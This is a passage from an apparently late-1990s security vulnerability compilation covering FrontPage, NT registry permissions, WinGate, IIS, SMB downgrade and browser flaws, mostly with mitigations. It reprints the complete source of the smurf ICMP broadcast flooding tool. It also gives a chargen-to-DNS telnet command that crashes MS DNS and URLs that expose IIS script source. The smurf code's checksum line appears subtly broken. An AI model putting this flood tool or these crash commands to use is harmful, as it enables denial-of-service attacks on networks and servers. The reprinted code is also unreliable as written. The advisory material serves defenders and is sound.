One short term workaround until Microsoft addresses the issue is to simply remove the FrontPage setup from your system. This can be done temporarily by removing the setuid bit from fpexe (ie. chmod u-s fpexe). This will prevent all the pretty FrontPage CGIs from working. It will prevent people from uploading new pages using FrontPage's own methods (ie. they can tell FrontPage to use FTP and they will still be uploaded), but generic content that doesn't rely on FrontPage's server side CGI scripts should work fine.
Another possible workaround is to prevent users from running the ps command. This could have a very negative impact on your system if things depend on it, and is a poor solution however it may be the best one for you. On systems that don't use a procfs (/proc) based ps, you can normally simply remove world execute permissions from it to disable it. If you are on a system like Linux that normally uses a procfs for ps to get information, this doesn't solve the problem because someone can read from the procfs directly.
Last of all, since this problem only occurs when using FrontPage with the mod_frontpage extensions, it is possible to use the FrontPage extensions on Apache without using mod_frontpage or fpexe. Unfortunately, this conversion is not easy. It means that, after recompiling Apache without any of the Microsoft modifications (just commenting out mod_frontpage from the Configuration file may be enough; haven't checked) you have to either manually copy the FrontPage CGIs to the appropriate subdirectory under each user's web directory and make them setuid to that user or copy them (or make links) and don't make them setuid to that user. The former preserves the current ownership. With the latter all the user's web files will need to be changed back to being owned by the user the web server runs as or else they will be unable to manipulate them and some of the FP CGIs won't run correctly. This is a pain and brings you back to the horrible security practice of letting anyone who can run CGIs modify any FrontPage user's files. Although this may be the best temporary workaround (although quite annoying if you have a large number of users), I can not go into step by step details of how to accomplish this change because I am not fully familiar with various ways of using the FrontPage extensions. The Microsoft FP security considerations document (part of the FP98 Server Extensions Resource Kit) provides some more details of the method in which the CGIs are run without fpexe.

Comments:
This sort of continued disregard for security is unacceptable and inexcusable. It does not take significant knowledge to know that some of the things being done are flawed. If internal expertise is not available, an external consultant should be hired for a security review of any critical code such as fpexe. This is not rocket science nor is it particularily advanced programming. Nothing that I have described above is complicated or new. Code reviews are common practice in many companies and serve good purpose.
Once Microsoft fixes their glaring holes, assuming they do, I would suggest you should consider if you want to run their FrontPage extensions at all. Even though, once fpexe is properly fixed, you only risk the accounts of users using FrontPage (since that is who the FrontPage CGI scripts run as), that can be a significant risk. It is very possible that when someone gets bored they will find a hole in the FrontPage CGI scripts that gives them user level access to your system. And Microsoft doesn't (and isn't likely to in the future, if their past is any indication) give the source to those. Microsoft's own source speaks better for itself than anyone else ever could.
I have this nagging feeling that this will result in Microsoft coming out with a "fixed" version and not releasing the source to it at all. After all, it was only after the source came out that these flaws became a problem. Right? Wrong. This was a gaping hole waiting to be discovered. It would have almost certainly been discovered sooner or later regardless of source availability; better sooner than later. I certainly hope that Microsoft doesn't think the lesson in this is that source should not be released. It is insecure with or without the source. The FrontPage server extensions aren't going to find their way anywhere near any machines I control any time soon because I have no trust in the company behind them.
On a side note, Microsoft actually modifies the server name returned to clients when the FrontPage patches are installed in Apache to include "FrontPage/x.x.x". That is fine, however it gives anyone connecting to your server the ability to determine the chances of them being able to break into your system using holes in the FP server extensions.

[13.0.4] TCP/IP Flooding with Smurf

Found by TFreak (from ntsecurity.net)

The Problem
The smurf attack is quite simple. It has a list of broadcast addresses which it stores into an array, and sends a spoofed ICMP echo request to each of those addresses in series and starts again. The result is a devistating attack upon the spoofed IP. Depending on the amount of broadcast addresses used, many, many computers may respond to the echo request.
This attack can EASILY saturate a T1 circuit, rendering it completely useless.
HERE IS THE SMURF SOURCE CODE:
* $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $*
* spoofs icmp packets from a host to various broadcast addresses resulting
* in multiple replies to that host from a single packet.
* disclaimer:
* I cannot and will not be held responsible nor legally bound for the
* malicious activities of individuals who come into possession of this
* program and I refuse to provide help or support of any kind and do NOT
* condone use of this program to deny service to anyone or any machine.
* This is for educational use only. Please Don't abuse this.
* TFreak
*/
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>
void banner(void);
void usage(char *);
void smurf(int, struct sockaddr_in, u_long, int);
void ctrlc(int);
unsigned short in_chksum(u_short *, int);
/* stamp */
char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $";
int main (int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *he;
FILE *bcastfile;
int i, sock, bcast, delay, num, pktsize, cycle = 0, x;
char buf[32], **bcastaddr = malloc(8192);
banner();
signal(SIGINT, ctrlc);
if (argc < 6) usage(argv[0]);
if ((he = gethostbyname(argv[1])) == NULL) {
perror("resolving source host");
exit(-1);
}
memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(0);
num = atoi(argv[3]);
delay = atoi(argv[4]);
pktsize = atoi(argv[5]);
if ((bcastfile = fopen(argv[2], "r")) == NULL) {
perror("opening bcast file");
exit(-1);
}
x = 0;
while (!feof(bcastfile)) {
fgets(buf, 32, bcastfile);
if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue;
for (i = 0; i < strlen(buf); i++)
if (buf[i] == '\n') buf[i] = '\0';
bcastaddr[x] = malloc(32);
strcpy(bcastaddr[x], buf);
x++;
}
bcastaddr[x] = 0x0;
fclose(bcastfile);
if (x == 0) {
fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
exit(-1);
}
if (pktsize > 1024) {
fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
exit(-1);
}
if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("getting socket");
exit(-1);
}
setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast));
printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);
for (i = 0; i < num || !num; i++) {
if (!(i % 25)) { printf("."); fflush(stdout); }
smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
cycle++;
if (bcastaddr[cycle] == 0x0) cycle = 0;
usleep(delay);
}
puts("\n\n");
return 0;
}
void banner (void)
{
puts("\nsmurf.c v4.0 by TFreak\n");
}
void usage (char *prog)
{
fprintf(stderr, "usage: %s "
" \n\n"
"target = address to hit\n"
"bcast file = file to read broadcast addresses from\n"
"num packets = number of packets to send (0 = flood)\n"
"packet delay = wait between each packet (in ms)\n"
"packet size = size of packet (< 1024)\n\n", prog);
exit(-1);
}
void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize)
{
struct iphdr *ip;
struct icmphdr *icmp;
char *packet;
packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));
memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);

ip->ihl = 5;
ip->version = 4;
ip->ttl = 255;
ip->tos = 0;
ip->frag_off = 0;
ip->protocol = IPPROTO_ICMP;
ip->saddr = sin.sin_addr.s_addr;
ip->daddr = dest;
ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr));
icmp->type = 8;
icmp->code = 0;
icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize);

sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize,
0, (struct sockaddr *)&sin, sizeof(struct sockaddr));
free(packet); /* free willy! */
}
void ctrlc (int ignored)
{
puts("\nDone!\n");
exit(1);
}
unsigned short in_chksum (u_short *addr, int len)
{
register int nleft = len;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)addr;
sum += answer;
}
sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}

[13.0.5] SLMail Security Problem

Found by David LeBlanc (from ntsecurity.net)

David LeBlanc writes:
Version 2.5 (current version) is vulnerable to a buffer overrun attack on the POP3 service. If the username supplied is too long, the service will fail with a memory exception. To the best of our knowledge, there are no current exploits which can cause remote execution, but given the characteristics of the failure, it seems entirely possible that this could occur. At the very least, it constitutes a denial of service which will require rebooting the server if attacked. We notified Seattle Lab of this problem two months ago, and they did not seem to understand the severity of the problem.
Stopping the Problem:
Upgrade to version 2.6

[13.0.6] IE 4.0 and DHTML

Found by Ralf Hueskes (ntsecurity.net)

The Problem
A dangerous security hole in Internet Explorer 4.0 was detected by Ralf Hueskes of Jabadoo Communications when he conducted a series of security tests for C'T computer magazine.
His tests revealed that it is possible to spy on the contents of any text and HTML files on somebody else's computer. Not only local files are in danger, but also data on your company's intranet - even if it is protected by a firewall.
The security hole exists even if users have activated the highest security level in their browser. The problem affects both the German and the English version of the Internet Explorer.
The code needed for infiltrating your files can be hidden in any normal Web page or in an e-mail message.
Technical Details
The spy pages make use of JScript. If a user accesses a page or receives an e-mail containing this code, infiltration begins ...
The spy page contains a so-called IFRAME sized 1 by 1 pixel. When a user accesses the page or opens the e-mail message, a small Jscript program loads the HTML or text file to be spied on into this frame. The contents of the frame can then be read using Dynamic HTML and sent as a parameter hidden in a URL to any Web server in the Internet.
Protective Measures
According to Ralf Hueskes of Jabadoo Communications, the security hole exploits an error in the Internet Explorer 4.0 that can be fixed only by the manufacturer. Microsoft is aware of the problem and will make available a patch for download from

http://www.microsoft.com/ie/

on October 17th 1997.
Experienced users can protect themselves by completely deactivating the execution of Active Scripting in the security settings (menu item: Tools/Options/Security, Settings/Custom (for expert users)/Active Scripting/Disable) and by using the Security Zones feature in Internet Explorer 4.0.

[13.0.7] 2 NT Registry Risks
Found by David LeBlanc (ntsecurity.net)

The Problem
The attack was described most adequated in the ISS X-Force Security Advisory:
ISS Security Alert
October 21, 1997
Scheduler/Winlogin Keys have Incorrect Permissions
This advisory describes two similar configuration problems in the Windows NT Registry key permissions. These vulnerabilities can allow users with Server Operator privilege to increase their access level to Administrator.
Problem 1: Scheduler Key Has Incorrect Permissions
Affects: Windows NT
Description: The HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Schedule key controls the schedule service. Server Operators have permission to write to this registry tree, which would allow them to manually schedule jobs to be run by the schedule service, which normally executes under the system user context. This can be used to raise the Server Operator's access level to Administrator.
Risk: Medium
Solution: Local Machine (GUI): From the Start menu, choose 'Run.' Type 'regedt32' and click 'OK.' This opens the Registry Editor. Through the Security menu, remove write access to the Schedule key for Server Operators.
Problem 2: Winlogon Key Has Incorrect Permissions
Affects: Windows NT
Description: The HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon key has two values which can be used to cause a process to execute upon either system bootup, or when a user logs on. The programs pointed to by the System value run under the system user context after boot, and could be used to change a user's rights or access level. The UserInit value runs applications when a user logs in. The default settings for this key allow Server Operators to write these values, either of which could be used to raise a System Operator's access level to Administrator.
Risk: Medium
Solution: Local Machine (GUI): From the Start menu, choose 'Run.' Type 'regedt32' and click 'OK.' This opens the Registry Editor. Through the Security menu, remove write access to the Winlogon key for Server Operators.
================================
Caution: Care must be taken when using the Registry Editor. If incorrect values are entered, the system may become inoperable. Should a mistake be made when editing the registry values, the registry state can be restored to the state at the last time the system booted up. For more information, see the Windows NT Help under the "Registry" section.

================================
Acknowledgments: This problem was identified by David LeBlanc of ISS (dleblanc@iss.net).

[13.0.8] Wingate Proxy Server
Found by Bill Mattocks

The Problem
The attack was described most adequated by the person reporting it to us, Bill Mattock:
A recent hole has been discovered in the default security settings of a popular Windows 95 / Windows NT proxy server called WinGate, by Deerfield Communications:
This bug was discovered by a 15-year-old hacker, Joshua E. Rodd, whose e-mail address is jerrod@ibm.net
As a semi-well-known anti-spammer, I am active in the Usenet newsgroup known as news.admin.net-abuse.email. Recently, we anti-spammers came under attack by person or persons unknown, who was sending us a variety of hateful e-mail, seemingly from different dialup ISP ports around the world.
I was fortunate enough to observe two such attacks in progress, and I telnetted to the IP addresses indicated by the headers on the e-mail messages. In each case, I was greeted by a "WinGate>" prompt, although the IP addresses were different.
Apparently, a number of other anti-spammers got the same "hate" e-mail, and notified the ISP that the e-mail appeared to be coming from - in at least one case, a dialup user lost their access because of the complaints.
Because I had seen a "WinGate" prompt at two different IP addresses were the attacks seemed to be originating from, I decided to do a little digging. I discovered that the text of the message contained some mispellings that were unusual. I used DejaNews to search for those mispellings, in conjunction with the word "WinGate." I thereby discovered young Mr. Rodd.
He had discovered this bug, had written an exploit for it, and had written a netscanner which would comb a specified netblock looking for vulnerable WinGate hosts. He managed to find that if one telnets to a WinGate host that is not properly secured (which was, until a week or so ago, the default state of these servers), one could telnet into and then back out of the WinGate server, which would "launder" one's actual IP address. Thereafter, if one mounted an attack on another machine, or if one sent e-mail by "hijacking" an open SMTP server, one would seem to be coming from the location of the WinGate server. This exploit was used to harass anti-spammers with untraceable e-mail, but one could well imagine that it could be used for a variety of other attacks.
It is easy to see that this type of IP laundering would be simpler to perform than IP spoofing, and nearly as bulletproof in terms of being untraceable.
Joshua has, unfortunately, disseminated his hacking tools far and wide by now, as he was quite proud of his abilities.
This information has been reported by C/Net news last week, and has been given to Deerfield Communications as well. Michael Deerfield is the CEO of the corporation, and he is quite concerned, but he is also understandably quite concerned about the potential publicity damage to his company. He was initially a bit hostile, posting messages in Usenet news to the effect that this type of "wide open" behaviour of his WinGate Proxy server was "by design," and was totally secure. He failed to immediately grasp that although the INTERIOR of the proxy server probably is safe from attack, the rest of the Internet is not safe from this exploit, which would result in fingers of blame being pointed back at his innocent clintele, and then eventually to WinGate.
WinGate has indicated that this "bug," which they still claim is not a bug, has been repaired in the newest version of WinGate, v2.0. However, WinGate is available as shareware, and Deerfield Communications has estimated that there are hundreds of thousands of copies of the older software in circulation. Deerfield HAS placed simple instructions on disabling telnet on their web page, with a quick description of why a sysadmin would want to do so.

This information has been reported to CERT at cert@cert.org, however, they have not responded at this time, and it has been nearly two weeks since I reported it. Vint Cerf has also been notified, and he assigned an MCI security person to look into it, and that person has not responded to me at this time, either (after an initial e-mail message, that is).
As this is not an exploit designed to penetrate a network, nor is it an Denial of Service attack, I believe that many people are pooh-pooh'ing the incident, and I have heard comments to the effect that "all firewalls and proxy servers are like that." Perhaps so, but I only know of this one at this time.

[13.0.9] O'Reilly Website uploader Hole
Found by Herman deVette

Systems running Website(c) with uploader.exe in place are vulnerable. Website ships with a program called UPLOADER.EXE that allows compatible Web clients to upload files to the Web server. Using the UPLOADER.EXE application with a modified HTML page will allow an attacker to upload an file the attacker wishes.

The following is from Herman:
"The program uploader.exe doesn't check anything at all. If you're lucky, you're running Windows NT and have put only "read/execute access" on CGI-WIN and other executable paths. Otherwise (win95) you have a real problem. You could create a CGI program, next you change the HTML file a little like this.
Open the HTML file in your browser, select a nice CGI file to upload and run that CGI program remotely. (No need to tell you what this CGI program could do, could be .bat file too in one of Website's other CGI directories)"
Herman de Vette
To Stop the problem, get rid of the uploader.exe application and ftp your information.

[13.1.0] Exchange 5.0 Password Caching
Found by Rajiv Pant

Exchange 5.0 Server's POP3 service has a bug in it that causes the system to not properly flush cached passwords. Old passwords will continue to be valid along with newly set passwords. This problem will persist until the cache is flushed. David LeBlanc points out that Microsofts FTP, HTTP,and Gopher service also suffer from the same problem. The problem does not affect NT logins themselves.
To correct the problem, you must edit the following registry keys:
HKLM\System\CurrentControlSet\Services\MsExchangeIs\ParametersNetIf\Credentials
Cache Age Limit (Default = 120 minutes)
HKLM\System\CurrentControlSet\Services\MsExchangeIs\ParametersNetIf\Credentials
Cache Idle Limit (Default = 15 minutes)
HKLM\System\CurrentControlSet\Services\MsExchangeIs\ParametersNetIf\Credentials
Cache Size (Default = 256 buckets)
Make the settings = 0

[13.1.1] Crashing NT using NTFS
Found by Martin Stiemerling

Affects NT systems running Service Pack 3 also.
Recently, a program released from Germany (crashnt.exe) seems to be able to crash an NT server. The program was coded by Martin Stiemerling. It executes in a command window and functions off of one parameter, a drive letter. (example: crash d:). It seems that the program may be a spawn of an NT Defragmentation program. The fact that this program will crash and render an NTFS volume useless is spooky.
David LeBlanc says he thinks this may be a result of something in the NtFsControlFile() function.

[13.1.2] The GetAdmin Exploit
Found by Konstantin Sobolev

The GetAdmin program originated in Russia and has the ability to add users to the Administrators group. No special permissions are needed to execute the program, which interestingly runs through a telnet session as well. Microsoft released a patch that they said stops the attack. If however, you run crash4.exe on the server first and then run GetAdmin, the exploit still works. (All of the executables discussed here are available in the tools section.)

[13.1.3] Squid Proxy Server Hole
Found by Fred Albrecht

If someone FTP's into site via URL, the password the user uses could possibly be recovered from NetScape Communicator or from the logs of the Squid Proxy server (versions 1.1.10 and 1.1.11).
-- Excerpt from ntsecurity.net
Method for testing:
1. Start NS Communicator 4.0
2. Enter a URL of the form "

ftp://user@host.domain.xxx

"
3. Communicator pops up a password entry dialog. Enter the password.
4. When the file list is displayed in the browser window, follow the "Parent Directory" link
5. Click the BACK button (seems to be optional in Linux)

The password is now plainly visible in the URL field, similar to the following:
"

ftp://user:passwd@host.domain.xxx

"
We'll explain this out a bit clearer below:
Normally, if a site allows anonymous FTP, this means you don't need a username and password pair to login. You just use "anonymous" and your email addr for the password and you're in - which is handled transparently by your browser when used for FTP access. But if the site is regulated, and requires a username password pair, then you'd be prompted by Communicator 4.0 if, and only if, you used Communicator to FTP to that protected site.
Let's say you want to FTP to a site which is protected. You'd enter a URL like this: "

ftp://yourname@ftp.someftpsite.com

- at which point Communicator connects to the site, and pops up a window asking you to enter your password that matches the "yourname" user account. You enter the password, click OK, and it sends it to the site for authentication. BUT, IT ALSO PUTS IT IN THE HISTORY FILE OF COMMUNICATOR in this format: "

ftp://yourname:password@ftp.someftpsite.com

".
So you can see, in the beginning, the URL did not have the password included. But, once you enter the password using Communicator 4.0, it gets added to the URL and put in the history file.
Therefore, anyone with access to your Communicator would have access to your history file, and thus, the stored passwords - should there be any.
Be aware that it has been reported that JavaScript can access the history list, meaning a malicious Web page could be grabbing passwords from your browser without your knowledge.
ALSO - it appears that the Squid Proxy Server is in fact writing the user's password in plain text to its own logs as well - which we should all know is a bad thing.
Netscape says the root of the problem lies in the Squid Proxy, not Communicator.

Stopping the Attack : Don't use Communicator for FTP'ing to sites that require a username and password. Use a standalone FTP client instead, until Netscape releases a fix.

[13.1.4] Internet Information Server DoS attack

Found by Todd Fast

You can crash an IIS box by sending a large URL to it (4-8K). --To Quote ntsecurity.net According to Microsoft personnel, "it's a very specific boundary condition when parsing the headers. The end of a token (method, URL, version or header) must be exactly at 8k, followed by a second token. Our max header buffer is 8k, anything beyond gets thrown out as an invalid request. In this particular scenario, an index gets misinterpreted as a pointer so we deref 0x00002000 which lo' and behold, doesn't exist."

Stopping the Attack : Load the patch available from microsoft.

[13.1.5] Ping Of Death II
Found By Jiva DeVoe

In keeping with the tradition of the first ping of death, Ping Of Death II (Or SPing) sends multiple 64k packets, which still become fragmented and will cause a windows system to lock up completely.
Stopping the Attack : Block all inbound ICMP traffic.

[13.1.6] NT Server's DNS DoS Attack
--From ntsecurity.net

Microsoft DNS can be made to crash by redirecting the output of the Chargen service to the MS DNS service. A typical attack might be launched from a system using the following command:
$ telnet ntbox 19 | telnet ntbox 53
The above command is shown as seen on a UNIX command line. Once the command is issued, a telnet session is opened on port 19 (chargen) of the ntbox, and all output is redirected to a second telnet session opened on port 53 (dns) of the same ntbox. Launching the attack in this manner may subject the attacker to the same barrage of packets the DNS service will experience. But none-the-less, the attack is successful in crashing MS DNS.
Stopping the Attack : Stopping the attack is done by performing one of the following:
Don't run MS DNS until it's proven to be less bug ridden. Instead, you may opt for running a free version of BIND for NT which is not subject to this attack. If you rely on MS DNS interoperating with WINS, you may opt for MetaInfo's DNS, which is a direct BIND port and works great in conjunction with WINS. If you must go on using MS DNS, be forewarned that it may be incredibly difficult to stop this attack, since it can be done through impersonation and by using non-standard ports for chargen.
You can block port TCP port 53 using NT's built-in TCP/IP filtering. This stops zone transfers and TCP based name resolutions. This does not stop the UDP port 53 from continuing to operate normally. DNS normally relies on UDP for its name resolution transactions.
Or, you can filter TCP port 53 on your routers to bordering networks, allowing only trusted secondary DNS servers to do zone transfers.
Any one of the above three solutions should help you stop the attack cold.
This type of attack (pointing chargen output to other ports) can go along way towards bogging down lots of services, some of which die like MS DNS. You'd be well advised to disable NT's Simple TCP/IP Services (if installed) using Control Panel | Services. This stops the chargen, echo, daytime, discard, and quote of the day (qotd) services. Any of which could be used for denial of service attacks. None of these services are required for proper network operation - although you should be aware that a few types of network monitors occasionally test the echo port when they cannot get a response using ping. If you find the need to run one or more of these services independant of the others, you can turn on/off each respective service by adjusting Registry entries found in the following subtree:
HKEY_LOCAL_MACHINE\CurrentControlSet\Services\SimpTcp\Parameters
By changing the established value of both the EnableTcpXXXX and EnableUdpXXXX parameters from 0x1 to 0x0, you effectively disable that particular service.
The following parameters are available for adjustment:
EnableTcpChargen
EnableTcpDaytime
EnableTcpDiscard
EnableTcpEcho
EnableTcpQotd
EnableUdpChargen
EnableUdpDaytime
EnableUdpDiscard
EnableUdpEcho

EnableUdpQotd
BE CAREFUL WHEN MAKING REGISTRY CHANGES, AS ERRORS CAN RENDER A SYSTEM NON-BOOTABLE.
Keep in mind that this does not stop attacks that originate from other system's chargen ports, nor will it stop impersonated port attacks.

[13.1.7] Index Server Exposes Sensitive Material
Found by Andrew Smith

One of the components of Index Server (which is the internal search engine component thats part of Internet Information Server.) can expose material of a highly sensitive nature. This component, webhits.exe allows the web server to read files it would normally not be able to read. If the administrator of the server has left the default sample files on IIS, a hacker could easily have the ability to narrow their searches for usernames and passwords. Once an intruder has located an IIS box that has these default samples still on the server, the intruder can use the sample search page to specify only files that have the word password in them and are script files.
The URL the hacker would try is

http://servername/samples/search/queryhit.htm

then the hacker would search with something like "#filename=*.asp"
When the results are returned not only can one link to the files but also can look at the "hits" by clicking the view hits link that uses the webhits program. This program bypasses the security set by IIS on script files and allows the source to be displayed.
The default path to webhits.exe is:

http://servername/scripts/samples/search/webhits.exe

Stopping the Attack : Remove webhits.exe or move it from its default location.

[13.1.8] The Out Of Band (OOB) Attack
This is a DoS attack that affects NT and 95 machines alike.
--To Quote ntsecurity.net

How it Works:
The attack is done by sending Out of Band (OOB) data to an established connection. NetBIOS, which listens on port 139 among others, seems to be the most affected - but the attack may work against MS-DNS running on port 53, causing massive Event Log entries related to "select() errors", as reported by David LeBlanc. Apparently the OS doesn't know how to handle OOB data properly, so it may panic, causing strange things to happen. NT displays the Blue Screen of Death (BSOD) indicating TCPIP.SYS as the cuplrit, and definately requires a reboot after being attacked. Windows 95 may or may not crash completely, but always presents a blue exception screen, indicating MSTCP and NDIS as the culprits. Win95 always stops talking on the network after the attack.
STOPPING THE ATTACK:
Block inbound access to port 139 at your router. Alternatively you can stop the server service on NT systems, but this renders the box unable to share objects such as printers and directories. You may also use the built-in NT TCP/IP filtering to block non-local network access to port 139.
In regards to Windows 95 machines, the only way right now to disable port 139 is to unload network drivers completely, or use a packet filter to block traffic to port 139 on that machine, as mentioned above.

[13.1.9] SMB Downgrade Attack

May 6, 1997 - 3pm CST [NTSD] - On the heals of April's RedButton exploit comes yet another demonstration of attacking NT networks. A new program has just been released, complete with source code, that will downgrade a Server Message Block (SMB) negotiation - the standard handshake that occurs when a client attempts to connect to an NT Server. Downgrading the authentication causes the client to send its password in clear text, unencrypted - Ouch. This has been a known possibility for quite some time, however no one has released a working program along with source code up until now.
The program actually runs on a Windows based system loaded with Novell ODI style drivers running in promiscuous mode. Once active, the software listens for SMB negotiations, and upon detecting one, the software sends a single packet to the client instructing it to downgrade its connection attempt to a clear text level - at which point the client silently obeys by sending its password in clear readable text. Once this happens this little piece of software actually grabs the password as it travels over the wire and displays it on the screen. The client is successfully connected to the NT Server, and the user remains none-the-wiser that its password has just been grabbed.
Under Windows networking, when a client creates a new connection to an NT Server, the clients can be instructed to use a particular authentication mechanism: clear-text or challenge/response. As a result, clients can be instructed to transmit their password in clear text form very easily.
Furthermore, if an NT Server requested an encrypted login from the client, NT will authenticate the client, even if the client submits the password in clear text after being told to send an encrypted challenge/response answer. To make matters worse, there is no indication that this is taking place, and there is no way to provide an audit trail on the NT Server that indicates the clients are using clear-text passwords - even though the server has requested encrypted authentication. Perhaps NT should in fact be capable of logging an audit trail on this type of activity (hint hint).
A result of this design characteristic, a rogue client could sit on your network silently listening for username and password pairs traveling across the network during authentication. No physical access or user rights and permissions are required for this attack to work! All that's need is a connection to your network between the clients and servers.
As I said, this type of SMB downgrade attack has been a known possibility for quite some time - as noted in the Common Internet File System (CIFS) specification (section 8.5.2) - and similar, although not quite the same types of exploits have been demonstrated recently by various college students attempting to show vulnerabilities in Internet Explorer and Windows NT. Previously, NT LAN Manager negotiation and hostile SMB servers were shown to effectively initiate, intercept, or intervene in certain aspects of the client/server authentication process.
The person bringing this new program to our attention, David Loudon, has suggested that, "Microsoft could initially create a server patch that would not allow the NT Server to accept clear text passwords. While this does not prevent the exposure of the clear-text password, at least the administrator would be alerted that clients were sending clear-text passwords when requested to send encrypted passwords. To completely resolve this issue, all Microsoft networking clients must be replaced with new code that would never send clear text passwords during the authentication process.
"As long as Microsoft networking is enabled on any DOS, Windows 3.1, Windows for Workgroups, Windows 95, or Windows NT clients, users are susceptible to disclosing their clear text passwords to other devices on the physical network. Resolving this issue requires an administrator to update the Microsoft networking components on all affected desktops as soon as a fix is available from Microsoft."
Microsoft is definitely aware of this issue, and it appears that this type of functionality was knowingly put in place in order to remain backward compatible with older Microsoft clients like DOS. As a result, don't expect to see a fix for this until Service Pack 3 comes out, and maybe even later.
The new CIFS Authentication proposal seems to address this issue and a few other potential nasty security problems, but there is no guarantee the new CIFS specs will make it into SP3 yet. The probable outcome is that the new CIFS Authentication specification, which is being hashed out in a public forum on the Internet, will contain newfound configuration switches that can force the client and/or servers to require either clear text or encrypted negotiations.

[13.2.0] RedButton
--From ntsecurity.net

A new program was released this weekend that allows ANYONE with remote access to an NT server (using ports 137, 138, and 139) to connect to that machine, read the registry, and create a new share accessible to the Everyone group. This is a SERIOUS problem that should be guarded against at all costs. A quick test of this new RedButton program shows that it does in fact connect to a remote NT system.
Administrators should seriously consider blocking access to ports 137, 138, and 139 on any machines exposed to the Internet. You can also stop the Server service to protect yourself, although doing so eliminates the ability for that server to share resources.
Another consideration is to edit the Registry as follows:
1. Open HKEY_LOCAL_MACHINE/CurrentControlSet/Control/SecurePipeServers
2. Create a key called winreg (if it doesn't exist)
3. Set the security on it however you like, but don't give the Everyone group access - but don't define Everyone with NO ACCESS either as this locks out all accounts.
4. Reboot the system
RedButton was released by MWC, security consultants, who are maintaining a Web page about the new RedButton software at

http://www.ntsecurity.com/redbutton

. NOTE: This Web address is ntsecurity.com - not associated with NTSD or ntsecurity.net. We are not responsible for content at thier site.
RedButton will:
* logon remotely to a target computer without presenting a username and password
* gain access to the resources available to the Everyone group
* determine the current name of built-in Administrator account
* read several registry entries and display the information
* list all shares - even hidden shares
Microsoft released a HOTFIX for the RedButton problems on May 3, 1997. Be CERTAIN to read the Knowledge Base articles and README files in the distribution directory - this software hotfix installs itself without warning so be careful to understand it completely before proceeding.

[13.2.1] FrontPage WebBot Holes
---From ntsecurity.net

Microsoft has uncovered a bug in the Microsoft FrontPage Server Extensions that allow knowledgeable users to potentially add content to pages on a Web site without permission through use of raw HTML. This can only happen if:
Someone viewing a Web page has an advanced mastery of HTML
The Web site is hosted on a server that contains the FrontPage server extensions
A Web page contains a Save Results WebBot Component or a Discussion WebBot Component
Since raw HTML is not filtered out of entries made in the entry fields of the Save Results or Discussion WebBot Components, it is possible for a knowledgeable person browsing a site to enter the tags necessary to create a form within these fields. If the results page is then fetched for browsing the newly inserted form will be available for use by anyone browsing the site. The result is that anyone browsing could then append information to pages in the Web site even though they do not have authoring permission.
After isolating the bug and replicating it we concluded the best way to address the issue was to create new versions of the FrontPage 97 Server Extensions. These Server Extensions are being made immediately available at no charge to all of our users via download from the FrontPage Web site at

http://www.microsoft.com/frontpage/softlib/current.htm

. In addition, we are in the process of proactively sending a set of the updated FrontPage 97 Server Extensions to all Internet Service Providers we know of that are currently using the FrontPage Server Extensions, and we will also include them in the Windows NT Server Service Pack 3.
This issue came to our attention within the last two weeks from a Microsoft employee creating a Web site with FrontPage. Since then we have been confirming and replicating the error to ensure that it was not an isolated incident. As far as we know, this issue has affected no one outside of Microsoft.
This bug affects Web sites created with FrontPage 1.1 for Windows and FrontPage 97 with Bonus Pack for Windows that are hosted on Web servers with any version of the FrontPage Server Extensions installed. However, it only affects those sites that contain the WebBot components described above.
Any web server with the FrontPage 97 or 1.1 Server Extensions installed and active FrontPage webs with the WebBots specified above are potentially at risk. If the server has server-side include capability enabled then the potential exposure is higher. However, server-side includes are a Web server feature that should be carefully evaluated by any Internet server owner regardless of whether the FrontPage Server Extensions are installed.
This issue is most likely to be a problem for Internet Service Providers who are hosting webs on the Internet with the FrontPage Server Extensions. However, FrontPage 97 automatically installs a web server onto the workstation in order to store Web sites on the workstation for local authoring and staging. Consequently each workstation with FrontPage 97 should be upgraded with the new version of the FrontPage 97 Server Extensions for maximum security. If your workstation does not have a full-time connection to the Internet and you connect occasionally through a modem then the risk of exposure is low but still present, and Microsoft recommends that you install the new Server Extensions.

[13.2.2] IE and NTLM Authentication
--From ntsecurity.net

A new problem discovered in MS Internet Explorer shows that NT transparently negotiates an authentication attempt with a remote Web server any time that remote server requests an NTLM authentication process. During that process, Internet Explorer will transmit your user name, password, NT domain or workgroup name, and hostname.
Take note here that during this negotiation process, two versions of the user password are transmitted. One is the full length password and the other represents the first 14 characters of the password, transformed in to upper case letters. This fact alone is a GREAT argument for longer passwords - longer that 14 chars that is.
